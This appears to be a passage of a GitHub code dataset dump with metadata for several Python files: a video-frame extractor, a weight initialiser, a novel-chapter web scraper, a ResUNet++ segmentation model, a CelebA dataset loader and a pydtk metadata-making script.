cv2.imwrite(\"{}/{}/{number:05}.jpg\".format(path, current_name, number=count),image) # save frame as JPEG file\n success,image = vidcap.read()\n count += 1", "repo_name": "cilkim1/speech_ani_gan", "sub_path": "video_to_frame.py", "file_name": "video_to_frame.py", "file_ext": "py", "file_size_in_byte": 652, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "86", "api": [{"api_name": "glob.glob", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "18477235696", "text": "import torch.nn as nn\n\n\ndef init_weights_xav(m: nn.Module) -> None:\n \"\"\"\n Initialize Xavier normal weights for a layer.\n\n Parameters\n ----------\n m : nn.Module\n Layer whose weights to initialize.\n\n Returns\n -------\n None\n \"\"\"\n if isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n m.bias.data.fill_(0)\n", "repo_name": "camille-004/rl", "sub_path": "src/models/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 363, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.nn.Module", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 4, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 18, 
"usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "3008339590", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport code\n\ndef code_what(url):\n from urllib import request\n from chardet import detect\n #读取网页内容\n data = request.urlopen(url).read()\n #chardet解析网页\n chardet1 = detect(data)\n return chardet1['encoding']\n\nheaders={\n 'UserAgent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'\n }\n\n#网站的初始页码\nurl= ''\n#apple = code_what(url)\nfor u in range(0,100000): \n res=requests.get(url,headers=headers)\n res.encoding = \"gbk\"\n\n soup=BeautifulSoup(res.text,'html.parser')\n \n print('正在下载')\n print(soup.find_all('h1')[0].string)\n #print(soup.find_all(\"a\"))\n #print(soup.find_all(\"a\",text=\"下一章\"))\n apple = soup.find_all(\"a\",text=\"下一章\")[0][\"href\"]\n #input()\n url='' + apple \n text_100 = soup.get_text()\n #print(text)\n m = re.search('style3', text_100)\n n = re.search('style4', text_100)\n try:\n text_101 = text[m.span()[1]+3:n.span()[0]]\n except:\n text_101 = text_100\n ls1 = []\n flag = True\n count = 0\n for i in text_101: \n if i == '\\u3000':\n if flag:\n ls1.append('\\n')\n flag = False\n continue\n else:\n flag = False\n continue\n ls1.append(i)\n flag = True\n \n \n ls3 = ''.join(ls1)\n #print(ls3)\n #print(text_101)\n ls3.encode('UTF-8')\n filename = 'write_data.txt'\n #print(ls3)\n \n with open(filename,'a',encoding='UTF-8') as f:\n f.write(ls3)\n print('下载完成'+str(u+1))\n \n\n\n \n\n", "repo_name": "Lin1110/-", "sub_path": "python.py", "file_name": "python.py", "file_ext": "py", "file_size_in_byte": 1717, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "urllib.request.urlopen", "line_number": 10, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 10, "usage_type": "name"}, {"api_name": "chardet.detect", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 23, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 26, "usage_type": "call"}, {"api_name": "re.search", "line_number": 37, "usage_type": "call"}, {"api_name": "re.search", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "11564957925", "text": "import torch\r\nimport torch.nn as nn\r\n\r\n\r\n\r\nclass ResidualStem(nn.Module):\r\n def __init__(self, input_dim, output_dim):\r\n super(ResidualStem, self).__init__()\r\n\r\n self.conv_block1 = nn.Sequential(\r\n \r\n nn.Conv2d(input_dim, int(output_dim/2), kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(int(output_dim/2)),\r\n nn.ReLU(),\r\n nn.Conv2d(int(output_dim/2), int(output_dim/2), kernel_size=3, padding=1),\r\n nn.BatchNorm2d(int(output_dim/2))\r\n )\r\n\r\n self.conv_block2 = nn.Sequential(\r\n nn.Conv2d(int(output_dim/2), output_dim, kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(output_dim),\r\n nn.ReLU(),\r\n nn.Conv2d(output_dim, output_dim, kernel_size=3, padding=1),\r\n nn.BatchNorm2d(output_dim)\r\n )\r\n\r\n self.conv_skip = nn.Sequential(\r\n nn.Conv2d(int(output_dim/2), output_dim, kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(output_dim)\r\n )\r\n\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n\r\n def forward(self, x):\r\n x1 = self.conv_block1(x)\r\n x2 = self.conv_block2(x1) + self.conv_skip(x1)\r\n x3 = self.relu(x2)\r\n return x3\r\n\r\n\r\nclass ResidualBlock(nn.Module):\r\n def __init__(self, input_dim, 
output_dim):\r\n super(ResidualBlock, self).__init__()\r\n\r\n self.conv_block1 = nn.Sequential(\r\n \r\n nn.Conv2d(input_dim, int(output_dim/2), kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(int(output_dim/2)),\r\n nn.ReLU(),\r\n nn.Conv2d(int(output_dim/2), int(output_dim/2), kernel_size=3, padding=1),\r\n nn.BatchNorm2d(int(output_dim/2))\r\n )\r\n\r\n self.conv_block2 = nn.Sequential(\r\n nn.Conv2d(int(output_dim/2), output_dim, kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(output_dim),\r\n nn.ReLU(),\r\n nn.Conv2d(output_dim, output_dim, kernel_size=3, padding=1),\r\n nn.BatchNorm2d(output_dim)\r\n )\r\n\r\n self.conv_skip = nn.Sequential(\r\n nn.Conv2d(int(output_dim/2), output_dim, kernel_size=3, stride=1, padding=1),\r\n nn.BatchNorm2d(output_dim)\r\n )\r\n\r\n self.relu = nn.ReLU(inplace=True)\r\n\r\n\r\n def forward(self, x):\r\n x1 = self.conv_block1(x)\r\n x2 = self.relu(x + x1)\r\n x3 = self.conv_block2(x2) + self.conv_skip(x2)\r\n x4 = self.relu(x3)\r\n return x4\r\n\r\n\r\n\r\nclass BasicConv2d(nn.Module):\r\n def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, bias=True):\r\n super(BasicConv2d, self).__init__()\r\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=padding, bias=bias)\r\n self.bn = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1)\r\n self.relu = nn.ReLU(inplace=True)\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.bn(x)\r\n x = self.relu(x)\r\n return x\r\n\r\n\r\n\r\nclass BridgeConv(nn.Module):\r\n\r\n def __init__(self, in_channels, out_channels):\r\n super(BridgeConv, self).__init__()\r\n\r\n # number of input channels is a number of filters in the previous layer\r\n # number of output channels is a number of filters in the current layer\r\n # \"same\" convolutions\r\n self.conv = nn.Sequential(\r\n nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=True),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=True),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\n def forward(self, x):\r\n x = self.conv(x)\r\n return x\r\n\r\n\r\nclass UpConv(nn.Module):\r\n\r\n def __init__(self, in_channels, out_channels):\r\n super(UpConv, self).__init__()\r\n\r\n self.up = nn.Sequential(\r\n nn.UpsamplingBilinear2d(scale_factor=2),\r\n nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=1, padding=1, bias=True),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\n def forward(self, x):\r\n x = self.up(x)\r\n return x\r\n\r\n\r\nclass Upsample(nn.Module):\r\n def __init__(self, input_dim, output_dim, kernel, stride, padding):\r\n super(Upsample, self).__init__()\r\n\r\n self.upsample = nn.ConvTranspose2d(\r\n input_dim, output_dim, kernel_size=kernel, stride=stride, padding=padding) \r\n\r\n def forward(self, x):\r\n return self.upsample(x)\r\n\r\n\r\nclass ResUnet_plus(nn.Module):\r\n def __init__(self, img_ch=3, output_ch=1):\r\n super(ResUnet_plus, self).__init__()\r\n\r\n self.encoder0 = ResidualStem(input_dim = img_ch, output_dim = 64)\r\n\r\n self.encoder1 = ResidualBlock(input_dim = 64, output_dim = 128)\r\n\r\n self.encoder2 = ResidualBlock(input_dim = 128, output_dim = 256)\r\n\r\n self.encoder3 = ResidualBlock(input_dim = 256, output_dim = 512)\r\n\r\n self.encoder4 = ResidualBlock(input_dim = 512, output_dim = 1024)\r\n\r\n self.encoder5 = BridgeConv(in_channels = 1024, out_channels = 
2048)\r\n\r\n self.MaxPool = nn.MaxPool2d(kernel_size=3,stride=2,ceil_mode=True)\r\n\r\n self.UpConv5_4 = Upsample(2048, 1024, kernel=2, stride=2, padding=0)\r\n self.UpConv5_3 = Upsample(2048, 128, kernel=4, stride=4, padding=0)\r\n self.UpConv5_2 = Upsample(2048, 64, kernel=8, stride=8, padding=0)\r\n self.UpConv5_1 = Upsample(2048, 32, kernel=16, stride=16, padding=0)\r\n self.UpConv5_0 = Upsample(2048, 16, kernel=32, stride=32, padding=0)\r\n\r\n self.UpConv4_3 = Upsample(2048, 512, kernel=2, stride=2, padding=0)\r\n self.UpConv4_2 = Upsample(2048, 64, kernel=4, stride=4, padding=0)\r\n self.UpConv4_1 = Upsample(2048, 32, kernel=8, stride=8, padding=0)\r\n self.UpConv4_0 = Upsample(2048, 16, kernel=16, stride=16, padding=0)\r\n\r\n self.UpConv3_2 = Upsample(1152, 256, kernel=2, stride=2, padding=0)\r\n self.UpConv3_1 = Upsample(1152, 32, kernel=4, stride=4, padding=0)\r\n self.UpConv3_0 = Upsample(1152, 16, kernel=8, stride=8, padding=0)\r\n\r\n self.UpConv2_1 = Upsample(640, 128, kernel=2, stride=2, padding=0)\r\n self.UpConv2_0 = Upsample(640, 16, kernel=4, stride=4, padding=0)\r\n\r\n self.UpConv1_0 = Upsample(352, 64, kernel=2, stride=2, padding=0)\r\n\r\n\r\n self.decoder0 = nn.Sequential(\r\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(64, output_ch, kernel_size=3, stride=1, padding=1)\r\n )\r\n\r\n\r\n\r\n def forward(self, x):\r\n \r\n # print(\"input: \", list(x.size()))\r\n # Encode\r\n\r\n e0 = self.encoder0(x) # C*W*H 64*512*512\r\n\r\n maxpool0 = self.MaxPool(e0) \r\n e1 = self.encoder1(maxpool0) # C*W*H 128*256*256\r\n # print(\"encoder 1\", list(e1.size()))\r\n\r\n maxpool1 = self.MaxPool(e1) # C*W*H 128*128*128\r\n e2 = self.encoder2(maxpool1) # C*W*H 256*128*128\r\n\r\n maxpool2 = self.MaxPool(e2) # C*W*H 256*64*64\r\n e3 = self.encoder3(maxpool2) # C*W*H 512*64*64\r\n\r\n maxpool3 = self.MaxPool(e3) # C*W*H 512*32*32\r\n e4 = self.encoder4(maxpool3) # C*W*H 1024*32*32\r\n \r\n maxpool4 = self.MaxPool(e4) # C*W*H 1024*16*16\r\n e5 = self.encoder5(maxpool4) # C*W*H 2048*16*16\r\n # print(\"bridge before attention\",list(e5.size()))\r\n\r\n # Decode\r\n # print(\"bridge after attention\", list(att_x5.size()))\r\n d5_4 = self.UpConv5_4(e5) # C*W*H 1024*32*32\r\n d5_3 = self.UpConv5_3(e5) # C*W*H 128*64*64\r\n d5_2 = self.UpConv5_2(e5) # C*W*H 64*128*128\r\n d5_1 = self.UpConv5_1(e5) # C*W*H 32*256*256\r\n d5_0 = self.UpConv5_0(e5) # C*W*H 16*512*512\r\n # print(\"after decoding 5\",list(d5.size()))\r\n # print(\"after encoding 4\",list(e4.size()))\r\n\r\n d4 = torch.cat((e4, d5_4), dim=1) # C*W*H 2048*32*32\r\n d4_3 = self.UpConv4_3(d4) \r\n d4_2 = self.UpConv4_2(d4)\r\n d4_1 = self.UpConv4_1(d4)\r\n d4_0 = self.UpConv4_0(d4)\r\n\r\n\r\n d3 = torch.cat((e3, d5_3, d4_3), dim=1) # C*W*H 1152*64*64\r\n d3_2 = self.UpConv3_2(d3) \r\n d3_1 = self.UpConv3_1(d3)\r\n d3_0 = self.UpConv3_0(d3)\r\n\r\n\r\n d2 = torch.cat((e2, d5_2, d4_2, d3_2), dim=1) # C*W*H 640*128*128\r\n d2_1 = self.UpConv2_1(d2) \r\n d2_0 = self.UpConv2_0(d2) \r\n\r\n\r\n d1 = torch.cat((e1, d5_1, d4_1, d3_1, d2_1), dim=1) # C*W*H 352*256*256\r\n d0 = self.UpConv1_0(d1) \r\n\r\n output = self.decoder0(d0) # C*W*H output_ch*512*512\r\n\r\n return output\r\n", "repo_name": "TeRyZh/Reconstruction-NGSIM-Trajectory-with-DMD-and-Res_UNet_plus", "sub_path": "Res_Unet_plus/ResUnet_plus.py", "file_name": "ResUnet_plus.py", "file_ext": "py", "file_size_in_byte": 8952, "program_lang": 
"python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "88", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 32, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": 
"torch.nn.Sequential", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 80, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 83, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 94, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 116, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.UpsamplingBilinear2d", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", 
"line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 133, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 133, "usage_type": "name"}, {"api_name": "torch.nn.ConvTranspose2d", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 144, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 183, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 184, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 185, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 186, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 187, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 188, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 240, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 245, "usage_type": "call"}]} +{"seq_id": "20895228277", "text": "import numpy as np\n\nfrom torchvision.datasets import CelebA\n\nfrom .utils import BaseTransforms\n\n\nclass CelebADataset(CelebA):\n \"\"\"Dataset for loading CelebA images.\"\"\"\n\n def __init__(\n self,\n data_root,\n celeba_transform,\n split='train',\n ):\n if split == 'val':\n split = 'valid'\n super().__init__(\n root=data_root,\n split=split,\n target_type=[],\n transform=celeba_transform,\n target_transform=None,\n download=False,\n )\n\n def _rand_another(self):\n \"\"\"Random get another sample when encountering loading error.\"\"\"\n another_idx = np.random.choice(len(self))\n data_dict = self.__getitem__(another_idx)\n data_dict['error_flag'] = True\n return data_dict\n\n def __getitem__(self, idx):\n \"\"\"Data dict:\n - data_idx: int\n - img: [C, H, W]\n - error_flag: whether loading `idx` causes error and _rand_another\n \"\"\"\n try:\n img, _ = super().__getitem__(idx)\n except FileNotFoundError:\n return self._rand_another()\n return {\n 'data_idx': idx,\n 'img': img,\n 'error_flag': False,\n }\n\n\ndef build_celeba_dataset(params, val_only=False):\n \"\"\"Build CelebA dataset that load images.\"\"\"\n args = dict(\n data_root=params.data_root,\n celeba_transform=BaseTransforms(params.resolution),\n split='val',\n )\n if val_only:\n print('Using CelebA test set!')\n 
args['split'] = 'test'\n val_dataset = CelebADataset(**args)\n if val_only:\n return val_dataset\n args['split'] = 'train'\n train_dataset = CelebADataset(**args)\n return train_dataset, val_dataset\n", "repo_name": "Wuziyi616/SlotDiffusion", "sub_path": "slotdiffusion/img_based/datasets/celeba.py", "file_name": "celeba.py", "file_ext": "py", "file_size_in_byte": 1791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 50, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torchvision.datasets.CelebA", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "utils.BaseTransforms", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "6110689746", "text": "#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport logging\nimport os\nfrom collections import defaultdict\n\nfrom pydtk.io.reader import BaseFileReader\nfrom pydtk.models import MetaDataModel\nfrom pydtk.utils.utils import load_config, smart_open\n\nconfig = load_config(\"v4\").bin.make_meta\n\n\ndef make_meta_interactively(template=None):\n \"\"\"Make metadata with the interactive command.\"\"\"\n if template is None:\n template = defaultdict(dict)\n meta = defaultdict(dict)\n for key in config.common_item.keys():\n if key in template.keys():\n meta[key] = str(\n input(f\"{config.common_item[key]} [{template[key]}]: \") or template[key]\n )\n else:\n meta[key] = input(f\"{config.common_item[key]}: \")\n return meta\n\n\ndef make_meta(file, template=None):\n \"\"\"Make metadata with a template.\"\"\"\n meta = template if type(template) is dict else defaultdict(dict)\n meta[\"path\"] = file\n if \"contents\" in meta.keys():\n meta[\"contents\"] = _get_contents_info(file)\n if \"start_timestamp\" in meta.keys() and \"end_timestamp\" in meta.keys():\n meta[\"start_timestamp\"], meta[\"end_timestamp\"] = _get_timestamps_info(file)\n return meta\n\n\ndef _get_contents_info(file_path):\n \"\"\"Get contents information from model.\n\n Args:\n file_path (str): path to the file\n\n Returns:\n (dict): contents info\n\n \"\"\"\n metadata = MetaDataModel(data={\"path\": file_path})\n model = BaseFileReader._select_model(metadata)\n contents = model.generate_contents_meta(path=file_path)\n return contents\n\n\ndef _get_timestamps_info(file_path):\n \"\"\"Get timestamp information from model.\n\n Args:\n file_path (str): path to the file\n\n Returns:\n (list): [start_timestamp, end_timestamp]\n\n \"\"\"\n metadata = MetaDataModel(data={\"path\": file_path})\n model = BaseFileReader._select_model(metadata)\n timestamps_info = model.generate_timestamp_meta(path=file_path)\n return timestamps_info\n\n\ndef get_arguments():\n \"\"\"Parse arguments.\"\"\"\n parser = argparse.ArgumentParser(description=\"Metadata maker.\")\n parser.add_argument(\n \"-i\",\n \"--interactive\",\n action=\"store_true\",\n help=\"interactive mode\",\n )\n parser.add_argument(\n \"--template\",\n type=str,\n default=None,\n help=\"path to a json file with the metadata template\",\n )\n parser.add_argument(\n \"--file\",\n type=str,\n default=None,\n help=\"file to make metadata for\",\n )\n parser.add_argument(\n \"--out_dir\",\n type=str,\n default=None,\n help=\"output directory\",\n )\n return parser.parse_args()\n\n\ndef main():\n \"\"\"Make metadata.\"\"\"\n # set logger\n logging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s\",\n )\n args = 
get_arguments()\n if args.template is not None:\n with open(args.template, \"r\") as f:\n template = json.load(f)\n else:\n template = None\n\n if args.interactive:\n meta = make_meta_interactively(template)\n meta_json = input(\"output json: \")\n else:\n if args.file is None:\n raise ValueError(\"following arguments are required: --file\")\n meta = make_meta(args.file, template)\n if args.out_dir is None:\n meta_json = None\n else:\n meta_json = os.path.join(args.out_dir, os.path.basename(args.file) + \".json\")\n\n with smart_open(meta_json, \"wt\") as f:\n json.dump(meta, f, indent=4)\n logging.info(f\"Dumped: {meta_json}\")\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "dataware-tools/pydtk", "sub_path": "pydtk/bin/make_meta.py", "file_name": "make_meta.py", "file_ext": "py", "file_size_in_byte": 3649, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pydtk.utils.utils.load_config", "line_number": 13, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 19, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 20, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 33, "usage_type": "call"}, {"api_name": "pydtk.models.MetaDataModel", "line_number": 52, "usage_type": "call"}, {"api_name": "pydtk.io.reader.BaseFileReader._select_model", "line_number": 53, "usage_type": "call"}, {"api_name": "pydtk.io.reader.BaseFileReader", "line_number": 53, "usage_type": "name"}, {"api_name": "pydtk.models.MetaDataModel", "line_number": 68, "usage_type": "call"}, {"api_name": "pydtk.io.reader.BaseFileReader._select_model", "line_number": 69, "usage_type": "call"}, {"api_name": "pydtk.io.reader.BaseFileReader", "line_number": 69, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 76, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 108, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": 